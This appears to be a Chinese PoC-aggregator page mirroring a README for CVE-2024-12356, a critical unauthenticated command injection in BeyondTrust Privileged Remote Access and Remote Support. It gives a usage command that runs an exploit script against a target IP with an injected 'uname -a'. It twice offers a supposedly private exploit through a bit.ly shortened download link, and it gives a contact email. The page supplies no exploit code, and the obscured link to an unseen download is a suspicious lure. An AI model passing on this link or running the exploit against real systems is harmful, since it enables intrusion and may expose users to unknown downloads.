关联漏洞
描述
CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
介绍
# CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
## Overview
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. This is a command injection vulnerability, classified under CWE-77 (Improper Neutralization of Special Elements used in a Command).
## Details
+ CVE ID: CVE-2024-12356
+ Published: 2024-12-16
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8
+ Vendor: **BeyondTrust**
## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**
## Vulnerability Description
The impact of this vulnerability is severe. It allows unauthenticated attackers to execute arbitrary commands with the privileges of a site user. This leads to unauthorized access, data breaches, system compromise, and full control over the affected systems. The attack vector is Network-based, requires no user interaction, and has low attack complexity, making it relatively easy for attackers to exploit.
## Usage
```
python CVE-2024-12356.py -h 10.10.10.10 -c 'uname -a'
```
## Affected Versions
**affected from 0 through 24.3.1**
## Exploit
**[Download Here](https://bit.ly/3OZPYhj)**
## Contact
For inquiries, please contact cloudefence@thesecure.biz
文件快照
[4.0K] /data/pocs/2b284838648f55597905c81fcc1b49c83f9cacdf
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。